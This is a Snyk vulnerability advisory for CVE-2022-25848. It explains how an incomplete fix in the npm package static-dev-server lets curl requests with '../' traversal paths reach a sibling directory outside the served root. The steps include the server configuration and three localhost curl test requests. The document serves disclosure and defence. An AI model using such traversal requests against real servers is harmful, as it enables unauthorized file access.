CVE-2022-25848: Snyk Vulnerability Database | Snyk

1. Install the latest version of static-dev-server: npm install [email protected]

2. Make sure you have a public/ directory with files in it

3. Make sure you have a public-isprivate directory with files in it

4)Make sure you have a private/ directory with files in it

5)All directories above should share the same relative parent, meaning the directory structure should look as follows:

.
├── private
│   └── index.html
├── public
│   └── index.html
└── public-isprivate
    └── index.html

Then, run a server powered by static-dev-server as follows:

var StaticServer = require('static-dev-server');
var server = new StaticServer({
  rootPath: 'public',            // required, the root of the server file tree
  name: 'my-http-server',   // optional, will set "X-Powered-by" HTTP header
  port: 3000,               // optional, defaults to a random port
  host: '0.0.0.0',       // optional, defaults to any interface
  cors: '*',                 // optional, defaults to undefined
  followSymlink: true,      // optional, defaults to a 404 error
  templates: {
    index: 'foo.html',      // optional, defaults to 'index.html'
    notFound: '404.html'    // optional, defaults to undefined
  }
});

which sets the public root directory to the public/ directory that we previously created:

The server should run within the local folder where all private/, public/, and public-isprivate are subfolders.

Next, verify the following:

1. curl --path-as-is “http://localhost:3000/…/private/index.html” -> this request is denied, as expected with prior vulnerability fix.

2. curl --path-as-is “http://localhost:3000/…/public/index.html” -> this request is allowed, as expected with the functionality of this local http server

3. curl --path-as-is “http://localhost:3000/…/public-isprivate/index.html” -> this request SHOULD BE DENIED because it is outside the public/ folder, but it is actually allowed.

Case (3) shouldn’t happen, but it does, due to an improper fix in the library’s source code.